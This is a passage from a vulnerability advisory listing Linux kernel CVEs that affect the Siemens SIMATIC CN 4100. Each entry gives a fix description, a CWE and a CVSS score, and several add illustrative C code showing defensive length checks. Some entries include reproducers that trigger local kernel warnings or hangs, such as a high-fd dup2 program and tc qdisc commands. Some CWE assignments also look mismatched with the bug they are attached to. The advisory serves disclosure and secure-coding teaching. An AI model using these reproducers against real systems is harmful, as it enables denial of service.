[CVE-2025-39724] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition'). CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39736
In the Linux kernel, the following vulnerability has been resolved:

mm/kmemleak: avoid deadlock by moving pr_warn() outside kmemleak_lock

When netpoll is enabled, calling pr_warn_once() while holding kmemleak_lock in mem_pool_alloc() can cause a deadlock due to lock inversion with the netconsole subsystem. This occurs because pr_warn_once() may trigger netpoll, which eventually leads to __alloc_skb() and back into kmemleak code, attempting to reacquire kmemleak_lock.

This is the path for the deadlock.

mem_pool_alloc()
 -> raw_spin_lock_irqsave(&kmemleak_lock, flags);
  -> pr_warn_once()
   -> netconsole subsystem
    -> netpoll
     -> __alloc_skb
      -> __create_object
       -> raw_spin_lock_irqsave(&kmemleak_lock, flags);

Fix this by setting a flag and issuing the pr_warn_once() after kmemleak_lock is released.
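Two entries above, CVE-2025-39703 (HSR frame too short to hold the tag) and CVE-2025-39718 (vsock header announcing more payload than the skb can take), are the two directions of the same rule: a length that arrives with the data, whether implied by a short frame or declared in a header, has to be checked against the bytes that really exist before the parser reads or the receiver writes. The program below is an added illustration, not code from the kernel's HSR or vsock implementations. It parses a constructed HSR-tagged Ethernet frame (EtherType 0x892F followed by the 6-byte tag) only after confirming the frame holds both headers, and appends a constructed receive payload only after checking the header-supplied length against the tailroom of a fixed-size buffer that stands in for the skb. The `struct pkt_hdr` and `struct rx_buf` types are hypothetical stand-ins, not the virtio-vsock structures.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ETH_HLEN   14
#define ETH_P_HSR  0x892F   /* EtherType of an HSR-tagged frame */
#define HSR_HLEN   6        /* path/LSDU size (2) + sequence number (2) + encapsulated proto (2) */

struct hsr_tag {
    uint16_t path_and_lsdu_size;
    uint16_t sequence_nr;
    uint16_t encap_proto;
};

static uint16_t get_be16(const uint8_t *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

/*
 * Parse the HSR tag of a received frame. Returns 0 and fills *tag, or -1 if
 * the frame is not HSR or is too short to contain both the Ethernet header
 * and the full tag. The length check comes first: reading the tag of a
 * truncated frame means reading whatever follows it in memory.
 */
int hsr_parse_tag(const uint8_t *frame, size_t len, struct hsr_tag *tag)
{
    if (len < ETH_HLEN + HSR_HLEN)
        return -1;
    if (get_be16(frame + 12) != ETH_P_HSR)
        return -1;
    const uint8_t *t = frame + ETH_HLEN;
    tag->path_and_lsdu_size = get_be16(t);
    tag->sequence_nr        = get_be16(t + 2);
    tag->encap_proto        = get_be16(t + 4);
    return 0;
}

/* Minimal stand-in for an skb's linear area: fixed capacity and a current length. */
struct rx_buf {
    uint8_t data[64];
    size_t  len;
};

/* Hypothetical receive header carrying a length chosen by the remote side. */
struct pkt_hdr {
    uint32_t len;
};

/*
 * Append the payload announced by the header. hdr->len is untrusted, so it is
 * checked against the tailroom that really exists before anything is copied;
 * skipping this is the vsock bug class (a bad host value drives skb_put()).
 */
int rx_put(struct rx_buf *b, const struct pkt_hdr *hdr, const uint8_t *payload)
{
    size_t tailroom = sizeof(b->data) - b->len;
    if (hdr->len > tailroom)
        return -1;
    memcpy(b->data + b->len, payload, hdr->len);
    b->len += hdr->len;
    return 0;
}

/*
 * Constructed HSR frame: dst/src MAC, EtherType 0x892F, tag with sequence
 * number 7 and encapsulated EtherType 0x0800. Only the first `len` bytes are
 * handed to the parser, which models a frame truncated on the wire.
 */
int hsr_demo(size_t len)
{
    static const uint8_t frame[ETH_HLEN + HSR_HLEN] = {
        0x01, 0x15, 0x4e, 0x00, 0x01, 0x00,   /* dst */
        0x02, 0x00, 0x00, 0x00, 0x00, 0x01,   /* src */
        0x89, 0x2f,                           /* EtherType HSR */
        0x10, 0x12,                           /* path id / LSDU size */
        0x00, 0x07,                           /* sequence number */
        0x08, 0x00                            /* encapsulated EtherType */
    };
    struct hsr_tag tag;
    if (len > sizeof(frame))
        len = sizeof(frame);
    if (hsr_parse_tag(frame, len, &tag) < 0)
        return -1;
    return tag.sequence_nr;
}

/* Constructed receive: 16 bytes already queued, remote claims `claimed` more. */
int rx_demo(uint32_t claimed)
{
    static const uint8_t payload[64] = { 0 };  /* enough backing for any accepted length */
    struct rx_buf b = { .len = 16 };
    struct pkt_hdr hdr = { .len = claimed };
    return rx_put(&b, &hdr, payload);
}

int main(void)
{
    printf("full HSR frame: seq=%d\n",            hsr_demo(20));
    printf("frame cut after 4 tag bytes: %d\n",   hsr_demo(18));
    printf("claimed 48 bytes into 48 free: %d\n", rx_demo(48));
    printf("claimed 4096 bytes into 48 free: %d\n", rx_demo(4096));
    return 0;
}
```

The parse-side check is the one the HSR fix adds (drop anything shorter than ETH_HLEN + HSR_HLEN before touching the tag); the append-side check is the one the vsock fix adds (compare the header length with what the buffer can hold before `skb_put()`). Note that the vsock case validated the virtqueue buffer size and still overflowed, because the value that actually sized the write came from a different, attacker-influenced field.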
[CVE-2025-39736] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-833 Deadlock. CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39737
In the Linux kernel, the following vulnerability has been resolved:

mm/kmemleak: avoid soft lockup in __kmemleak_do_cleanup()

A soft lockup warning was observed on a relatively small x86-64 system with 16 GB of memory when running a debug kernel with kmemleak enabled.

watchdog: BUG: soft lockup - CPU#8 stuck for 33s! [kworker/8:1:134]

The test system was running a workload with hot unplug happening in parallel. Then kmemleak decided to disable itself due to its inability to allocate more kmemleak objects. The debug kernel has its CONFIG_DEBUG_KMEMLEAK_MEM_POOL_SIZE set to 40,000.

The soft lockup happened in kmemleak_do_cleanup() when the existing kmemleak objects were being removed and deleted one-by-one in a loop via a workqueue. In this particular case, there are at least 40,000 objects that need to be processed and given the slowness of a debug kernel and the fact that a raw_spinlock has to be acquired and released in __delete_object(), it could take a while to properly handle all these objects.

As kmemleak has been disabled in this case, the object removal and deletion process can be further optimized as locking isn't really needed. However, it is probably not worth the effort to optimize for such an edge case that should rarely happen. So the simple solution is to call cond_resched() at periodic interval in the iteration loop to avoid soft lockup.
[CVE-2025-39737] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-20 Improper Input Validation. CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39738
In the Linux kernel, the following vulnerability has been resolved:

btrfs: do not allow relocation of partially dropped subvolumes

[BUG]
There is an internal report that balance triggered transaction abort, with the following call trace:

 item 85 key (594509824 169 0) itemoff 12599 itemsize 33
   extent refs 1 gen 197740 flags 2
   ref#0: tree block backref root 7
 item 86 key (594558976 169 0) itemoff 12566 itemsize 33
   extent refs 1 gen 197522 flags 2
   ref#0: tree block backref root 7
 ...
 BTRFS error (device loop0): extent item not found for insert, bytenr 594526208 num_bytes 16384 parent 449921024 root_objectid 934 owner 1 offset 0
 BTRFS error (device loop0): failed to run delayed ref for logical 594526208 num_bytes 16384 type 182 action 1 ref_mod 1: -117
 ------------[ cut here ]------------
 BTRFS: Transaction aborted (error -117)
 WARNING: CPU: 1 PID: 6963 at ../fs/btrfs/extent-tree.c:2168 btrfs_run_delayed_refs+0xfa/0x110 [btrfs]

And btrfs check doesn't report anything wrong related to the extent tree.

[CAUSE]
The cause is a little complex, firstly the extent tree indeed doesn't have the backref for 594526208.
The extent tree only has the following two backrefs around that bytenr on-disk:

 item 65 key (594509824 METADATA_ITEM 0) itemoff 13880 itemsize 33
   refs 1 gen 197740 flags TREE_BLOCK
   tree block skinny level 0
   (176 0x7) tree block backref root CSUM_TREE
 item 66 key (594558976 METADATA_ITEM 0) itemoff 13847 itemsize 33
   refs 1 gen 197522 flags TREE_BLOCK
   tree block skinny level 0
   (176 0x7) tree block backref root CSUM_TREE

But such a missing backref item is not a corruption on disk, as the offending delayed ref belongs to subvolume 934, and that subvolume is being dropped:

 item 0 key (934 ROOT_ITEM 198229) itemoff 15844 itemsize 439
   generation 198229 root_dirid 256 bytenr 10741039104 byte_limit 0 bytes_used 345571328
   last_snapshot 198229 flags 0x1000000000001(RDONLY) refs 0
   drop_progress key (206324 EXTENT_DATA 2711650304) drop_level 2
   level 2 generation_v2 198229

And that offending tree block 594526208 is inside the dropped range of that subvolume. That explains why there is no backref item for that bytenr and why btrfs check is not reporting anything wrong.

But this also shows another problem, as btrfs will do all the orphan subvolume cleanup at a read-write mount. So half-dropped subvolume should not exist after an RW mount, and balance itself is also exclusive to subvolume cleanup, meaning we shouldn't hit a subvolume half-dropped during relocation.

The root cause is, there is no orphan item for this subvolume. In fact there are 5 subvolumes from around 2021 that have the same problem. It looks like the original report has some older kernels running, and caused those zombie subvolumes. Thankfully upstream commit 8d488a8c7ba2 ("btrfs: fix subvolume/snapshot deletion not triggered on mount") has long fixed the bug.

[ENHANCEMENT]
For repairing such old fs, btrfs-progs will be enhanced. Considering how delayed the problem will show up (at run delayed ref time) and at that time we have to abort transaction already, it is too late.
Instead here we reject any half-dropped subvolume for reloc tree at the earliest time, preventing confusion and extra time wasted on debugging similar bugs. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39742 In the Linux kernel, the following vulnerability has been resolved: RDMA: hfi1: fix possible divide-by-zero in find_hw_thread_mask() The function divides number of online CPUs by num_core_siblings, and later checks the divider by zero. This implies a possibility to get and divide-by-zero runtime error. Fix it by moving the check prior to division. This also helps to save one indentation level. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-369 Divide By Zero Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39743 In the Linux kernel, the following vulnerability has been resolved: jfs: truncate good inode pages when hard link is 0 The fileset value of the inode copy from the disk by the reproducer is AGGR_RESERVED_I. When executing evict, its hard link number is 0, so its inode pages are not truncated. This causes the bugon to be triggered when executing clear_inode() because nrpages is greater than 0. 
Affected product: Siemens SIMATIC CN 4100 (vendor: Siemens; product status: known_affected)
Remediation: vendor fix, update to V5.0 or later: https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1 base score: 7.0 HIGH (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)

CVE-2025-39749
In the Linux kernel, the following vulnerability has been resolved:

rcu: Protect ->defer_qs_iw_pending from data race

On kernels built with CONFIG_IRQ_WORK=y, when rcu_read_unlock() is invoked within an interrupts-disabled region of code [1], it will invoke rcu_read_unlock_special(), which uses an irq-work handler to force the system to notice when the RCU read-side critical section actually ends. That end won't happen until interrupts are enabled at the soonest.

In some kernels, such as those booted with rcutree.use_softirq=y, the irq-work handler is used unconditionally.

The per-CPU rcu_data structure's ->defer_qs_iw_pending field is updated by the irq-work handler and is both read and updated by rcu_read_unlock_special(). This resulted in the following KCSAN splat:

  ------------------------------------------------------------------------
  BUG: KCSAN: data-race in rcu_preempt_deferred_qs_handler / rcu_read_unlock_special

  read to 0xffff96b95f42d8d8 of 1 bytes by task 90 on cpu 8:
   rcu_read_unlock_special+0x175/0x260
   __rcu_read_unlock+0x92/0xa0
   rt_spin_unlock+0x9b/0xc0
   __local_bh_enable+0x10d/0x170
   __local_bh_enable_ip+0xfb/0x150
   rcu_do_batch+0x595/0xc40
   rcu_cpu_kthread+0x4e9/0x830
   smpboot_thread_fn+0x24d/0x3b0
   kthread+0x3bd/0x410
   ret_from_fork+0x35/0x40
   ret_from_fork_asm+0x1a/0x30

  write to 0xffff96b95f42d8d8 of 1 bytes by task 88 on cpu 8:
   rcu_preempt_deferred_qs_handler+0x1e/0x30
   irq_work_single+0xaf/0x160
   run_irq_workd+0x91/0xc0
   smpboot_thread_fn+0x24d/0x3b0
   kthread+0x3bd/0x410
   ret_from_fork+0x35/0x40
   ret_from_fork_asm+0x1a/0x30

  no locks held by irq_work/8/88.
  irq event stamp: 200272
  hardirqs last enabled at (200272): [] finish_task_switch+0x131/0x320
  hardirqs last disabled at (200271): [] __schedule+0x129/0xd70
  softirqs last enabled at (0): [] copy_process+0x4df/0x1cc0
  softirqs last disabled at (0): [<0000000000000000>] 0x0
  ------------------------------------------------------------------------

The problem is that irq-work handlers run with interrupts enabled, which means that rcu_preempt_deferred_qs_handler() could be interrupted, and that interrupt handler might contain an RCU read-side critical section, which might invoke rcu_read_unlock_special(). In the strict KCSAN mode of operation used by RCU, this constitutes a data race on the ->defer_qs_iw_pending field.

This commit therefore disables interrupts across the portion of rcu_preempt_deferred_qs_handler() that updates the ->defer_qs_iw_pending field. This suffices because this handler is not a fast path.
Affected product: Siemens SIMATIC CN 4100 (vendor: Siemens; product status: known_affected)
Remediation: vendor fix, update to V5.0 or later: https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1 base score: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39752
In the Linux kernel, the following vulnerability has been resolved:

ARM: rockchip: fix kernel hang during smp initialization

In order to bring up secondary CPUs, the main CPU writes trampoline code to SRAM. The trampoline code is written while the secondary CPUs are powered on (at least that is true for the RK3188 CPU). Sometimes that leads to a kernel hang, probably because a secondary CPU executes the trampoline code when the kernel doesn't expect it.

The patch moves the SRAM initialization step to the point where all secondary CPUs are powered down. That fixes rare hangs on RK3188:

  [    0.091568] CPU0: thread -1, cpu 0, socket 0, mpidr 80000000
  [    0.091996] rockchip_smp_prepare_cpus: ncores 4

Affected product: Siemens SIMATIC CN 4100 (vendor: Siemens; product status: known_affected)
Remediation: vendor fix, update to V5.0 or later: https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-364 Signal Handler Race Condition
CVSS 3.1 base score: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39756
In the Linux kernel, the following vulnerability has been resolved:

fs: Prevent file descriptor table allocations exceeding INT_MAX

When sysctl_nr_open is set to a very high value (for example, 1073741816 as set by systemd), processes attempting to use file descriptors near the limit can trigger massive memory allocation attempts that exceed INT_MAX, resulting in a WARNING in mm/slub.c:

  WARNING: CPU: 0 PID: 44 at mm/slub.c:5027 __kvmalloc_node_noprof+0x21a/0x288

This happens because kvmalloc_array() and kvmalloc() check if the requested size exceeds INT_MAX and emit a warning when the allocation is not flagged with __GFP_NOWARN.

Specifically, when nr_open is set to 1073741816 (0x3ffffff8) and a process calls dup2(oldfd, 1073741880), the kernel attempts to allocate:
- File descriptor array: 1073741880 * 8 bytes = 8,589,935,040 bytes
- Multiple bitmaps: ~400MB
- Total allocation size: > 8GB (exceeding INT_MAX = 2,147,483,647)

Reproducer:
1. Set /proc/sys/fs/nr_open to 1073741816:
     # echo 1073741816 > /proc/sys/fs/nr_open
2. Run a program that uses a high file descriptor:

     #include <sys/resource.h>   /* struct rlimit, setrlimit(), RLIMIT_NOFILE */
     #include <unistd.h>         /* dup2() */

     int main(void)
     {
         /* Raise the soft and hard fd limits so the high fd number is permitted. */
         struct rlimit rlim = {1073741824, 1073741824};
         setrlimit(RLIMIT_NOFILE, &rlim);
         dup2(2, 1073741880);   // Triggers the warning
         return 0;
     }

3. Observe WARNING in dmesg at mm/slub.c:5027

systemd commit a8b627a introduced automatic bumping of fs.nr_open to the maximum possible value. The rationale was that systems with memory control groups (memcg) no longer need separate file descriptor limits since memory is properly accounted. However, this change overlooked that:
1. The kernel's allocation functions still enforce INT_MAX as a maximum size regardless of memcg accounting
2. Programs and tests that legitimately test file descriptor limits can inadvertently trigger massive allocations
3. The resulting allocations (>8GB) are impractical and will always fail

systemd's algorithm starts with INT_MAX and keeps halving the value until the kernel accepts it. On most systems, this results in nr_open being set to 1073741816 (0x3ffffff8), which is just under 1GB of file descriptors.

While processes rarely use file descriptors near this limit in normal operation, certain selftests (like tools/testing/selftests/core/unshare_test.c) and programs that test file descriptor limits can trigger this issue.

Fix this by adding a check in alloc_fdtable() to ensure the requested allocation size does not exceed INT_MAX. This causes the operation to fail with -EMFILE instead of triggering a kernel warning and avoids the impractical >8GB memory allocation request.

Affected product: Siemens SIMATIC CN 4100 (vendor: Siemens; product status: known_affected)
Remediation: vendor fix, update to V5.0 or later: https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-401 Missing Release of Memory after Effective Lifetime
CVSS 3.1 base score: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39757
In the Linux kernel, the following vulnerability has been resolved:

ALSA: usb-audio: Validate UAC3 cluster segment descriptors

UAC3 class segment descriptors need to be verified as to whether their sizes match the declared lengths and whether they fit within the allocated buffer sizes, too. Otherwise malicious firmware may lead to unexpected OOB accesses.

Affected product: Siemens SIMATIC CN 4100 (vendor: Siemens; product status: known_affected)
Remediation: vendor fix, update to V5.0 or later: https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1 base score: 7.1 HIGH (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H)

CVE-2025-39759
In the Linux kernel, the following vulnerability has been resolved:

btrfs: qgroup: fix race between quota disable and quota rescan ioctl

There's a race between a task disabling quotas and another running the rescan ioctl that can result in a use-after-free of qgroup records from the fs_info->qgroup_tree rbtree.

This happens as follows:

1) Task A enters btrfs_ioctl_quota_rescan() -> btrfs_qgroup_rescan();
2) Task B enters btrfs_quota_disable() and calls btrfs_qgroup_wait_for_completion(), which does nothing because at that point fs_info->qgroup_rescan_running is false (it wasn't set yet by task A);
3) Task B calls btrfs_free_qgroup_config() which starts freeing qgroups from fs_info->qgroup_tree without taking the lock fs_info->qgroup_lock;
4) Task A enters qgroup_rescan_zero_tracking() which starts iterating the fs_info->qgroup_tree tree while holding fs_info->qgroup_lock, but task B is freeing qgroup records from that tree without holding the lock, resulting in a use-after-free.

Fix this by taking fs_info->qgroup_lock at btrfs_free_qgroup_config(). Also at btrfs_qgroup_rescan() don't start the rescan worker if quotas were already disabled.

Affected product: Siemens SIMATIC CN 4100 (vendor: Siemens; product status: known_affected)
Remediation: vendor fix, update to V5.0 or later: https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1 base score: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39760
In the Linux kernel, the following vulnerability has been resolved:

usb: core: config: Prevent OOB read in SS endpoint companion parsing

usb_parse_ss_endpoint_companion() checks the descriptor type before the length, enabling a potentially odd read outside of the buffer size. Fix this up by checking the size first, before looking at any of the fields in the descriptor.
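CVE-2025-39757 and CVE-2025-39760 come down to the same ordering rule: a descriptor's length field has to be checked against the bytes that actually remain before any other field is read, and a declared length has to cover the layout the parser is about to index. The following is an added example written for this page, not code from either kernel fix: a hardened walk over a constructed USB descriptor blob that collects SuperSpeed endpoint companion descriptors. The descriptor type codes and the 6-byte companion size are the USB 3.x values; the function name parse_ss_companions, the result struct and the three sample blobs are this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Descriptor type codes and defined sizes from the USB 3.x specification. */
#define USB_DT_ENDPOINT           0x05
#define USB_DT_SS_ENDPOINT_COMP   0x30
#define USB_DT_SS_EP_COMP_SIZE    6     /* bLength, bDescriptorType, bMaxBurst,
                                           bmAttributes, wBytesPerInterval */

struct ss_ep_comp_info {
    unsigned max_burst;
    unsigned bytes_per_interval;
};

/*
 * Walk a descriptor blob and collect SuperSpeed endpoint companion
 * descriptors. Returns how many were accepted, or -1 when the blob is
 * malformed. bLength is validated against the remaining bytes before
 * any other field of the descriptor is touched.
 */
int parse_ss_companions(const uint8_t *buf, size_t len,
                        struct ss_ep_comp_info *out, size_t max_out)
{
    size_t off = 0;
    int found = 0;

    while (off < len) {
        size_t remaining = len - off;

        if (remaining < 2)                 /* need bLength and bDescriptorType */
            return -1;
        uint8_t blen  = buf[off];
        uint8_t btype = buf[off + 1];
        /* A descriptor may not claim more bytes than remain, and
         * bLength < 2 would make the walk loop forever. */
        if (blen < 2 || blen > remaining)
            return -1;

        if (btype == USB_DT_SS_ENDPOINT_COMP) {
            /* The declared length must cover the defined layout before
             * bMaxBurst or wBytesPerInterval are read. */
            if (blen < USB_DT_SS_EP_COMP_SIZE)
                return -1;
            if ((size_t)found < max_out) {
                out[found].max_burst = buf[off + 2];
                out[found].bytes_per_interval =
                    (unsigned)buf[off + 4] | ((unsigned)buf[off + 5] << 8);
            }
            found++;
        }
        off += blen;                       /* skip any other descriptor by its length */
    }
    return found;
}

/* Constructed sample blobs (not captured from a device). Each starts with a
 * 7-byte bulk IN endpoint descriptor (address 0x81, wMaxPacketSize 1024). */
static const uint8_t good_blob[] = {
    0x07, USB_DT_ENDPOINT, 0x81, 0x02, 0x00, 0x04, 0x00,
    0x06, USB_DT_SS_ENDPOINT_COMP, 0x0f, 0x00, 0x00, 0x00,   /* bMaxBurst 15 */
};
/* Companion cut off after two bytes while still declaring bLength 6. */
static const uint8_t truncated_blob[] = {
    0x07, USB_DT_ENDPOINT, 0x81, 0x02, 0x00, 0x04, 0x00,
    0x06, USB_DT_SS_ENDPOINT_COMP,
};
/* Companion whose declared bLength (4) is shorter than the defined size. */
static const uint8_t short_comp_blob[] = {
    0x07, USB_DT_ENDPOINT, 0x81, 0x02, 0x00, 0x04, 0x00,
    0x04, USB_DT_SS_ENDPOINT_COMP, 0x0f, 0x00,
};

int main(void)
{
    struct ss_ep_comp_info info[4];

    printf("good blob: %d companion(s)\n",
           parse_ss_companions(good_blob, sizeof good_blob, info, 4));
    printf("truncated companion: %d\n",
           parse_ss_companions(truncated_blob, sizeof truncated_blob, info, 4));
    printf("short companion: %d\n",
           parse_ss_companions(short_comp_blob, sizeof short_comp_blob, info, 4));
    return 0;
}
```

The two rejected blobs are the two failure modes the CVEs describe: the truncated one would be caught by neither a type check nor a fixed-size read, and the short one is the UAC3 case of a declared length that does not match the defined layout. In both, the parser returns before indexing past what it has verified.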
Affected product: Siemens SIMATIC CN 4100 (vendor: Siemens; product status: known_affected)
Remediation: vendor fix, update to V5.0 or later: https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1 base score: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39766
In the Linux kernel, the following vulnerability has been resolved:

net/sched: Make cake_enqueue return NET_XMIT_CN when past buffer_limit

The following setup can trigger a WARNING in htb_activate due to the condition: !cl->leaf.q->q.qlen

  tc qdisc del dev lo root
  tc qdisc add dev lo root handle 1: htb default 1
  tc class add dev lo parent 1: classid 1:1 \
      htb rate 64bit
  tc qdisc add dev lo parent 1:1 handle f: \
      cake memlimit 1b
  ping -I lo -f -c1 -s64 -W0.001 127.0.0.1

This is because the low memlimit leads to a low buffer_limit, which causes packet dropping. However, cake_enqueue still returns NET_XMIT_SUCCESS, causing htb_enqueue to call htb_activate with an empty child qdisc. We should return NET_XMIT_CN when packets are dropped from the same tin and flow.

I do not believe a return value of NET_XMIT_CN is necessary for packet drops in the case of ack filtering, as that is meant to optimize performance, not to signal congestion.

Affected product: Siemens SIMATIC CN 4100 (vendor: Siemens; product status: known_affected)
Remediation: vendor fix, update to V5.0 or later: https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1 base score: 7.0 HIGH (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)

CVE-2025-39770
In the Linux kernel, the following vulnerability has been resolved:

net: gso: Forbid IPv6 TSO with extensions on devices with only IPV6_CSUM

When performing Generic Segmentation Offload (GSO) on an IPv6 packet that contains extension headers, the kernel incorrectly requests checksum offload if the egress device only advertises the NETIF_F_IPV6_CSUM feature, which has a strict contract: it supports checksum offload only for plain TCP or UDP over IPv6 and explicitly does not support packets with extension headers.

The current GSO logic violates this contract by failing to disable the feature for packets with extension headers, such as those used in GREoIPv6 tunnels. This violation results in the device being asked to perform an operation it cannot support, leading to a `skb_warn_bad_offload` warning and a collapse of network throughput. While device TSO/USO is correctly bypassed in favor of software GSO for these packets, the GSO stack must be explicitly told not to request checksum offload.

Mask NETIF_F_IPV6_CSUM, NETIF_F_TSO6 and NETIF_F_GSO_UDP_L4 in gso_features_check if the IPv6 header contains extension headers, so that the checksum is computed in software.

The exception is a BIG TCP extension, which, as stated in commit 68e068cabd2c6c53 ("net: reenable NETIF_F_IPV6_CSUM offload for BIG TCP packets"): "The feature is only enabled on devices that support BIG TCP TSO. The header is only present for PF_PACKET taps like tcpdump, and not transmitted by physical devices."
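To make the contract concrete, the following added example (written for this page, not code from the kernel commit) walks the IPv6 extension-header chain of the frame captured in the skb dump from the kernel log quoted below and applies the rule the fix enforces: checksum offload may only be requested when plain TCP or UDP follows the IPv6 header directly. The outer header carries a Destination Options header in front of GRE, so offload is masked; the inner IPv6 header inside the GRE payload has no extensions and TCP follows it, so offload would be allowed. The IP6_NH_* constants are the IANA protocol numbers; the function names, the ipv6_walk result struct and the simplified decision in ipv6_csum_offload_allowed (which deliberately ignores the BIG TCP hop-by-hop exception) are this example's own.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* IPv6 next-header values (IANA protocol numbers). */
#define IP6_NH_HOPOPTS   0
#define IP6_NH_TCP       6
#define IP6_NH_UDP       17
#define IP6_NH_ROUTING   43
#define IP6_NH_FRAGMENT  44
#define IP6_NH_GRE       47
#define IP6_NH_AH        51
#define IP6_NH_DSTOPTS   60

#define ETH_HLEN   14
#define IPV6_HLEN  40

/* The skb linear data from the kernel log quoted with this CVE:
 * Ethernet + IPv6 + Destination Options + GRE + inner IPv6 + TCP.
 * Only the linear part was logged, so the buffer is shorter than the outer
 * payload length claims; every bound below is taken from the buffer size. */
static const uint8_t skb_dump[] = {
    0xe4,0x3d,0x1a,0x7d,0xec,0x30,0xe4,0x3d,0x1a,0x7e,0x5d,0x90,0x86,0xdd,0x60,0x0e,
    0x00,0x0a,0x1b,0x34,0x3c,0x40,0x20,0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x12,0x20,0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x11,0x2f,0x00,0x04,0x01,0x04,0x01,0x01,0x00,0x00,0x00,
    0x86,0xdd,0x60,0x0e,0x00,0x0a,0x1b,0x00,0x06,0x40,0x20,0x23,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x12,0x20,0x23,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0xbf,0x96,0x14,0x51,0x13,0xf9,
    0xae,0x27,0xa0,0xa8,0x2b,0xe3,0x80,0x18,0x00,0x40,0x5b,0x6f,0x00,0x00,0x01,0x01,
    0x08,0x0a,0x42,0xd4,0x50,0xd5,0x4b,0x70,0xf8,0x1a,
};

struct ipv6_walk {
    int     ext_count;   /* extension headers between IPv6 and the payload */
    uint8_t l4proto;     /* protocol that follows the last extension header */
    size_t  l4off;       /* offset of that protocol's header in the buffer */
};

/* Walk the extension-header chain of the IPv6 header at ip6off. Returns
 * false if the chain does not fit inside len bytes. */
bool ipv6_walk_ext_hdrs(const uint8_t *pkt, size_t len, size_t ip6off,
                        struct ipv6_walk *out)
{
    if (ip6off > len || len - ip6off < IPV6_HLEN || (pkt[ip6off] >> 4) != 6)
        return false;

    uint8_t nexthdr = pkt[ip6off + 6];             /* Next Header field */
    size_t  off = ip6off + IPV6_HLEN;
    int     count = 0;

    for (;;) {
        size_t hlen;

        switch (nexthdr) {
        case IP6_NH_HOPOPTS: case IP6_NH_ROUTING: case IP6_NH_DSTOPTS:
        case IP6_NH_FRAGMENT: case IP6_NH_AH:
            break;                                  /* extension header, sized below */
        default:
            out->ext_count = count;                 /* transport or tunnel protocol */
            out->l4proto = nexthdr;
            out->l4off = off;
            return true;
        }
        if (len - off < 2)                          /* Next Header + Hdr Ext Len */
            return false;
        if (nexthdr == IP6_NH_FRAGMENT)
            hlen = 8;                               /* fixed size (RFC 8200) */
        else if (nexthdr == IP6_NH_AH)
            hlen = ((size_t)pkt[off + 1] + 2) * 4;  /* 4-octet units (RFC 4302) */
        else
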